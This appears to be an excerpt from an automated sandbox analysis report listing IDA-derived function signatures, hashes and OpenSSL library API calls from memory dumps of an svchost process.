                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zallocR_newR_set_debugR_vset_error
                                                                                              • String ID: @$create_channel$ossl_quic_new$ssl\quic\quic_impl.c
                                                                                              • API String ID: 1707950466-414960852
                                                                                              • Opcode ID: dfe8ce2f5f752a5847011871b0bfa246798d21550bca569168ae90550036ef29
                                                                                              • Instruction ID: a68a1129afdc29575989c094ae617e94fbb143d035cbc59f5af2b3d1e2176c55
                                                                                              • Opcode Fuzzy Hash: dfe8ce2f5f752a5847011871b0bfa246798d21550bca569168ae90550036ef29
                                                                                              • Instruction Fuzzy Hash: 57A173B2A0AB4281FB62DF35E4406AD67A4FB84B84F548236DEAD47769DF3CD940C740
                                                                                              APIs
                                                                                              • EVP_CIPHER_CTX_get_iv_length.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C37A
                                                                                              • memcpy.VCRUNTIME140(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C39E
                                                                                              • EVP_CipherInit_ex.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C410
                                                                                              • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C432
                                                                                              • EVP_CipherUpdate.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C450
                                                                                              • EVP_CipherUpdate.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C473
                                                                                              • EVP_CipherFinal_ex.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C487
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cipher$Update$Final_exInit_exX_ctrlX_get_iv_lengthmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1713099526-0
                                                                                              • Opcode ID: ae4966a4ba86e44269781f7c9de355cd7975bb776e5f628b99d2519fa1978a93
                                                                                              • Instruction ID: e73b43737626a31c7686b705221400d281be8eec1c72b12a5ed9cc931c060e85
                                                                                              • Opcode Fuzzy Hash: ae4966a4ba86e44269781f7c9de355cd7975bb776e5f628b99d2519fa1978a93
                                                                                              • Instruction Fuzzy Hash: 3E711572A1EB9582EB22DB39D440ABE7761FB86784F048535DE9D43B6ADE3CE450C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_newH_set_thunksO_zalloc
                                                                                              • String ID: ssl\quic\quic_ackm.c
                                                                                              • API String ID: 1913221612-1180045938
                                                                                              • Opcode ID: 312ca6fd29102169aac6c21b5ef1355aa77e5f7e5199564f8895cfdd037a6007
                                                                                              • Instruction ID: 576f90e6f6a360f4f13848c579abaff04e5052ad04b25e7b18cb766d18a1a2dd
                                                                                              • Opcode Fuzzy Hash: 312ca6fd29102169aac6c21b5ef1355aa77e5f7e5199564f8895cfdd037a6007
                                                                                              • Instruction Fuzzy Hash: 2E51BE72A0AB5582E755CB34F8802AA73A0FB44794F548236DFAD437A5EF3CE195C740
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B6B
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B8B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BA6
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BCD
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BE8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc$O_malloc
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              • API String ID: 2040210391-3166991913
                                                                                              • Opcode ID: 6cda075becab3af0e788c9a77e8d74d6d8312209e2894be365d782e07b669772
                                                                                              • Instruction ID: dfd6306a41d689d8519da65bc13022514e56d8753f5541ede7e7aa30b668b6ab
                                                                                              • Opcode Fuzzy Hash: 6cda075becab3af0e788c9a77e8d74d6d8312209e2894be365d782e07b669772
                                                                                              • Instruction Fuzzy Hash: 4A21B0B2A1A61285EA22DF66E8810BD37A1FB44BC4F488435DF6D03B65EF3DE905C700
                                                                                              APIs
                                                                                              • RtlCaptureContext.KERNEL32 ref: 64947664
                                                                                              • RtlLookupFunctionEntry.KERNEL32 ref: 6494767B
                                                                                              • RtlVirtualUnwind.KERNEL32 ref: 649476BD
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 64947704
                                                                                              • UnhandledExceptionFilter.KERNEL32 ref: 64947711
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64947717
                                                                                              • TerminateProcess.KERNEL32 ref: 64947725
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3266983031-0
                                                                                              • Opcode ID: 33ab5fbe6a7f6738baf7fe0598ee7cd881b47e5c4ad5dffd753a986b7fe805ca
                                                                                              • Instruction ID: 438d6b427901decc57405f96a3468465558ffb2b952defd0a2bb9f003901ed9e
                                                                                              • Opcode Fuzzy Hash: 33ab5fbe6a7f6738baf7fe0598ee7cd881b47e5c4ad5dffd753a986b7fe805ca
                                                                                              • Instruction Fuzzy Hash: 6E210479691B0089EB088F65F85478A37FAF749B88F540226DE4D47725EF3AC16AC720
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleO_free$CriticalDeleteSection
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 229191846-2915021490
                                                                                              • Opcode ID: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                              • Instruction ID: 52a6a7c5a5a1b42190cf0bcb471e9a2f0751981de75e28b7965b7d1b52e276f7
                                                                                              • Opcode Fuzzy Hash: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                              • Instruction Fuzzy Hash: 9D011AB6A1AA5281EB529F36F89137C2760AB85F89F08C135DE2D477A6DF3CD4448701
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_strdupR_newR_set_debug
                                                                                              • String ID: ssl3_ctx_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 1600027128-173183182
                                                                                              • Opcode ID: 3ca51c3792552783a2c0ff9086fbf793306b87b3daf39207b7d216cc3670f9e0
                                                                                              • Instruction ID: 5757204e75b43ee2546aa4d161eb6ad24294e67a794d054e27ede037487a17e0
                                                                                              • Opcode Fuzzy Hash: 3ca51c3792552783a2c0ff9086fbf793306b87b3daf39207b7d216cc3670f9e0
                                                                                              • Instruction Fuzzy Hash: 18F069F0A5BB4391EA239772E4822B96315BF40B44F808436EC2D0A6B9DE2EE6448300
                                                                                              APIs
                                                                                              • OPENSSL_LH_set_down_load.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A7EC
                                                                                              • OPENSSL_LH_doall_arg.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A7FF
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A808
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A811
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45B31B,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45A826
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_free$H_doall_argH_set_down_loadO_free
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 2477462044-3923830422
                                                                                              • Opcode ID: dffbc30bfe1f6889df76042a01ab6e2ac6416a65dd5eb904e9285d5f2a8e0ae5
                                                                                              • Instruction ID: c3264c524afbecf3e7831a3c8f8540a455c173706a2c2c7e6b4825cd8f113ea5
                                                                                              • Opcode Fuzzy Hash: dffbc30bfe1f6889df76042a01ab6e2ac6416a65dd5eb904e9285d5f2a8e0ae5
                                                                                              • Instruction Fuzzy Hash: 7DF012D1F5665241EE26EB76C8911BC1211AF85B84F44D431DD2E4B3B7DD2CE5568340
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45C786
                                                                                              • memcmp.VCRUNTIME140(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45C8CC
                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45C92E
                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000,?,00000000,00007FFBAB45BF3E,?,00007FFBAB451207), ref: 00007FFBAB45CAD6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$O_mallocmemcmp
                                                                                              • String ID: ssl\quic\quic_record_rx.c
                                                                                              • API String ID: 2178029887-3047069087
                                                                                              • Opcode ID: 4c1496c444f16a2a0f5bc286ecd1d9fdfb9f04a9237b887a38a36bddd5ff88de
                                                                                              • Instruction ID: 1a2f70d9c0f24edcded2e1da0b6ac740513a41afbce52319d614726322a39cb7
                                                                                              • Opcode Fuzzy Hash: 4c1496c444f16a2a0f5bc286ecd1d9fdfb9f04a9237b887a38a36bddd5ff88de
                                                                                              • Instruction Fuzzy Hash: 12223C72A0AF8586DA65CB35E440BE973A4FB48794F048235DFAD877A5DF38E4A4C700
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB491211
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB491227
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB49123C
                                                                                                • Part of subcall function 00007FFBAB490B30: CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B6B
                                                                                                • Part of subcall function 00007FFBAB490B30: CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490B8B
                                                                                                • Part of subcall function 00007FFBAB490B30: CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB49114B,00000000,?,?,?,?,00007FFBAB491FB3,?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED), ref: 00007FFBAB490BA6
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB491AED,?,00007FFBAB487FED,00000000,?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB4913CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_mallocO_zalloc
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_free$O_freeY_free
                                                                                              • String ID: ssl\ssl_cert.c
                                                                                              APIs
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F1A
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F38
                                                                                              • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F40
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45B30E,?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB462F55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_free$O_freeX_free
                                                                                              • String ID: ssl\quic\quic_srtm.c
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlock$D_read_lockH_retrievememcpy
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_bytes_exO_mallocmemset
                                                                                              • String ID: ssl\record\methods\tls_pad.c
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460843
                                                                                              • memcpy.VCRUNTIME140(?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460951
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460A08
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocmemcpy
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/ring_buf.h
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB4523E0), ref: 00007FFBAB45AC74
                                                                                              • OSSL_ERR_STATE_new.LIBCRYPTO-3-X64(?,00007FFBAB4523E0), ref: 00007FFBAB45ACBC
                                                                                                • Part of subcall function 00007FFBAB4521E0: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB45221D
                                                                                                • Part of subcall function 00007FFBAB4521E0: BIO_ctrl.LIBCRYPTO-3-X64 ref: 00007FFBAB452253
                                                                                                • Part of subcall function 00007FFBAB4521E0: BIO_ctrl.LIBCRYPTO-3-X64 ref: 00007FFBAB45226A
                                                                                                • Part of subcall function 00007FFBAB463040: RAND_priv_bytes_ex.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46307B
                                                                                                • Part of subcall function 00007FFBAB463040: CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463097
                                                                                                • Part of subcall function 00007FFBAB463040: EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630B5
                                                                                                • Part of subcall function 00007FFBAB463040: EVP_CIPHER_CTX_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630C6
                                                                                                • Part of subcall function 00007FFBAB463040: EVP_CIPHER_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630FE
                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463113
                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46313C
                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463158
                                                                                                • Part of subcall function 00007FFBAB463040: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46317A
                                                                                                • Part of subcall function 00007FFBAB45A910: CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A94B
